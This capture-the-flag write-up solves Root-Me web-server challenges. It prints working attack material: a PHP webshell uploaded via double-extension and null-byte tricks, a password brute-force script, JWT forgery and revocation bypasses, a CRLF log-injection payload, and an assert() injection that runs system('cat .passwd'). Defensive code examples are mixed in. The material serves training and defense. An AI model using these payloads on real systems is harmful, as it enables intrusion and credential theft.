
Web - Server

Note : A JOURNEY TO GAIN KNOWLEDGE


Last updated 2 years ago

1.HTML - Source code

F12 for flag

2.HTTP - IP restriction bypass

Syntax: X-Forwarded-For: <client>,<proxy1>,<proxy2>,<proxy3>

Set the client entry to a private IP by adding an X-Forwarded-For header
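The bypass above works because the server trusts X-Forwarded-For from any peer. As an added example (not from the writeup or the challenge), this is how an application should derive the client IP: the header is only honoured when the connection came through one of our own proxies, and even then only the right-most hop we did not add counts. The 10.0.0.0/8 proxy range and the sample addresses are constructed.

```python
import ipaddress

# Constructed: the only hosts allowed to set X-Forwarded-For are our own reverse proxies.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr, xff_header):
    """IP that an access-control check should evaluate.
    remote_addr: the TCP peer of this connection. xff_header: raw X-Forwarded-For value or None."""
    peer = ipaddress.ip_address(remote_addr)
    if not _trusted(peer) or not xff_header:
        return str(peer)                # header did not pass through our proxy: ignore it
    # Each proxy appends the address it saw, so walk from the right and skip our own
    # hops; the first address we did not add is the real client. Anything further left
    # (such as a client-supplied "127.0.0.1") is never consulted.
    for hop in reversed(xff_header.split(",")):
        try:
            addr = ipaddress.ip_address(hop.strip())
        except ValueError:
            return str(peer)            # malformed header: fall back to the peer
        if not _trusted(addr):
            return str(addr)
    return str(peer)                    # only our own proxies listed: treat as the peer
```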

3.HTTP - Open redirect

The redirect parameter combines a URL with the MD5 hash of that URL, so we just supply a different URL together with its MD5 hash.

4.HTTP - User-agent

change User-Agent to `admin`

5.Weak password

import requests
from requests.auth import HTTPBasicAuth

url = "http://challenge01.root-me.org/web-serveur/ch3/"
usr = "admin"
# one candidate per line; drop blank lines so an empty password is not tried
words = [w for w in open('common_password.txt', 'r').read().split('\n') if w]

for cnt, pwd in enumerate(words, start=1):
    print(pwd, cnt)
    res = requests.get(url, auth=HTTPBasicAuth(usr, pwd))
    # check the status code: the 401 page body does not have to contain the text "401"
    if res.status_code != 401:
        print('Password is ' + pwd)
        break

6.PHP - Command injection

7.Backup file

Use dirsearch to find some interesting files:

/web-serveur/ch11/index.php~

8.HTTP - Directory indexing

http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt

9.HTTP - Headers

With a normal request we get:

Add a header to the request:

Header-RootMe-Admin: True

10.HTTP - POST

11.HTTP - Improper redirect

Capture the response before it redirects

12.HTTP - Verb tampering

At first I thought it was brute force, so I sat there with hydra and rockyou.txt spamming it for a whole hour

Tampering here just means switching to a method other than GET and POST; just hit it with PUT or DELETE

13.File upload - Double extensions

<?php echo shell_exec($_GET['cmd']); ?>

Name it file.php.png and upload it to the server

?cmd=cd;cat .passwd

14.File upload - MIME type

Change the Content-Type to image/png, then RCE:

?id=cd;cat .passwd

15.HTTP - Cookies

Change the cookie from visiteur to admin

16.JSON Web Token (JWT) - Introduction

Use the "none" signature algorithm

17.Directory traversal

Try with ../ and fuzz the path

18.JSON Web Token (JWT) - Weak secret

Brute-force the secret key: lol

POST with the re-signed token and look for the flag, hm....

19.File upload - Null byte

Create the file file.php%0a.png containing:

<?php echo shell_exec('id'); ?>
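Challenges 13, 14 and 19 all get past an upload filter that looks at the wrong thing: the last extension, the client's Content-Type, or a filename with a control character in it. As an added example (not from the writeup or the challenge), this is a server-side check that closes all three at once: exactly one extension from an allowlist, no control characters, and the type decided by the file's magic bytes rather than the header. The magic table and the sample bytes in the test are constructed.

```python
import re

ALLOWED = {"png", "jpg", "jpeg", "gif"}
# Magic bytes -> canonical extension; constructed table covering only the allowed types.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff(content):
    """Type according to the bytes themselves, or None if unknown."""
    for magic, ext in MAGIC.items():
        if content.startswith(magic):
            return ext
    return None


def safe_upload_name(filename, content):
    """Return the name to store the file under, or None to reject the upload.
    The Content-Type header is deliberately not a parameter: it is client-controlled."""
    # Control characters (\x00, \n, ...) are rejected outright; a decoded %00 or %0a is
    # exactly what makes the extension check and the interpreter disagree on the name.
    if re.search(r"[\x00-\x1f\x7f]", filename):
        return None
    parts = filename.split(".")
    if len(parts) != 2:          # exactly one extension: "file.php.png" has two
        return None
    stem, ext = parts
    ext = {"jpeg": "jpg"}.get(ext.lower(), ext.lower())
    if ext not in ALLOWED or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return None
    if sniff(content) != ext:    # the bytes, not the header, decide the type
        return None
    return f"{stem}.{ext}"
```

Storing the file under a server-generated name outside the web root removes the remaining dependence on the web server's handler mapping.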

20.Install files

use dirsearch: /web-serveur/ch6/phpbb/install

21. JWT - Revoked token

Source of the challenge:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from flask_jwt_extended import JWTManager, jwt_required, create_access_token, decode_token
import datetime
from apscheduler.schedulers.background import BackgroundScheduler
import threading
import jwt
from config import *
 
# Setup flask
app = Flask(__name__)
 
app.config['JWT_SECRET_KEY'] = SECRET
jwtmanager = JWTManager(app)
blacklist = set()
lock = threading.Lock()
 
# Free memory from expired tokens, as they are no longer useful
def delete_expired_tokens():
    with lock:
        to_remove = set()
        global blacklist
        for access_token in blacklist:
            try:
                jwt.decode(access_token, app.config['JWT_SECRET_KEY'],algorithm='HS256')
            except:
                to_remove.add(access_token)
       
        blacklist = blacklist.difference(to_remove)
 
@app.route("/web-serveur/ch63/")
def index():
    return "POST : /web-serveur/ch63/login <br>\nGET : /web-serveur/ch63/admin"
 
# Standard login endpoint
@app.route('/web-serveur/ch63/login', methods=['POST'])
def login():
    try:
        username = request.json.get('username', None)
        password = request.json.get('password', None)
    except:
        return jsonify({"msg":"""Bad request. Submit your login / pass as {"username":"admin","password":"admin"}"""}), 400
 
    if username != 'admin' or password != 'admin':
        return jsonify({"msg": "Bad username or password"}), 401
 
    access_token = create_access_token(identity=username,expires_delta=datetime.timedelta(minutes=3))
    ret = {
        'access_token': access_token,
    }
   
    with lock:
        blacklist.add(access_token)
 
    return jsonify(ret), 200
 
# Standard admin endpoint
@app.route('/web-serveur/ch63/admin', methods=['GET'])
@jwt_required
def protected():
    access_token = request.headers.get("Authorization").split()[1]
    with lock:
        if access_token in blacklist:
            return jsonify({"msg":"Token is revoked"})
        else:
            return jsonify({'Congratzzzz!!!_flag:': FLAG})
 
 
if __name__ == '__main__':
    scheduler = BackgroundScheduler()
    job = scheduler.add_job(delete_expired_tokens, 'interval', seconds=10)
    scheduler.start()
    app.run(debug=False, host='0.0.0.0', port=5000)

Use python requests to POST the login data:

import requests

url = "http://challenge01.root-me.org/web-serveur/ch63/login"
myobj = {"username": "admin","password": "admin"}
x = requests.post(url, json = myobj)

print(x.text)
#{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NjA3MzI2MjcsIm5iZiI6MTY2MDczMjYyNywianRpIjoiNzFjYTYxYTEtNjU1Yy00Zjk5LTkwM2ItODViZjBjMjI4ZmQ3IiwiZXhwIjoxNjYwNzMyODA3LCJpZGVudGl0eSI6ImFkbWluIiwiZnJlc2giOmZhbHNlLCJ0eXBlIjoiYWNjZXNzIn0.7koOz8cupf0o2ZtMA_pr_03cKXq-uIcTgp6zGKMts-g"}

The problem is that we have to bypass the blacklist: every access_token is added to the blacklist the moment it is issued, and the admin endpoint checks the raw token string against that set. The JWT library decodes the token leniently, so a differently written but equivalent token still verifies without being "in" the blacklist:

  • per RFC 3548 (base64), characters outside the alphabet are skipped by the decoder

  • replace an underscore "_" with "/"

  • add == at the end of the JWT -> the fastest way to see it
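The root cause is revocation keyed on the token's spelling instead of on a claim. As an added example (not the challenge's code), this rebuilds the check with the standard library only: a minimal HS256 signer, a lenient base64url decoder of the kind the writeup describes, the challenge's string-membership check, and the fixed version that verifies first and then revokes by the jti claim. The secret and claims are constructed.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # constructed for this example, not the challenge's key


def b64url_decode(seg):
    # Lenient decode like the challenge's library: pad to a multiple of 4 and let the
    # stdlib (validate=False by default) skip characters outside the alphabet and stop
    # at the first complete padding sequence, so "sig==" decodes exactly like "sig".
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_token(claims):
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify(token):
    """Return the claims if the HS256 signature checks out, else None."""
    try:
        header, body, sig = token.split(".")
        expected = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return None
        return json.loads(b64url_decode(body))
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None


def vulnerable_is_revoked(token, blacklist):
    # The challenge's check: exact string membership. An equivalent spelling of the
    # same token (trailing "==", "_" written as "/") still verifies but is not in the set.
    return token in blacklist


def fixed_is_revoked(token, revoked_jtis):
    # Verify first, then key revocation on the jti claim, which survives re-encoding.
    claims = verify(token)
    return claims is None or claims.get("jti") in revoked_jtis
```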

22. CRLF

Input -> fuzz

Entering a random username and password, we can clearly see that the log records the username -> attack from here

The goal is to get the log to record "admin authenticated."

?username=admin authenticated.%0d%0aa&password=b

Send the payload in the URL, URL-encoded so that the server decodes it
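The log line is forged because the username is written into it verbatim. As an added example (not from the writeup or the challenge), this reproduces that behaviour next to the fix, which escapes control characters before logging, plus a small check that flags entries in an existing log that rendered as more than one line. The log format mirrors the challenge's "<username> authenticated." wording and is otherwise constructed.

```python
import re

CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def unsafe_log_line(username, ok):
    # The challenge's behaviour: the raw username goes straight into the log line.
    return f"{username} {'authenticated' if ok else 'failed to authenticate'}."


def safe_log_line(username, ok):
    # Escape CR, LF and every other control character first, so the username can
    # never terminate the current line and start a forged one.
    clean = CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), username)
    return f"{clean} {'authenticated' if ok else 'failed to authenticate'}."


def injected_entries(entries):
    # Detection on an existing log: an entry written by a single call that renders
    # as several lines can only have come from CR/LF inside user input.
    return [e for e in entries if len(e.splitlines()) > 1]
```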

23. Insecure Code Management

http://challenge01.root-me.org/web-serveur/ch61/.git

24.PHP - assert()

Detect the File Inclusion bug -> LFI via PHP's assert()

Suspicious:

GET /web-serveur/ch47/?page= ...

Payload:

' and die(system("cat .passwd")) or '
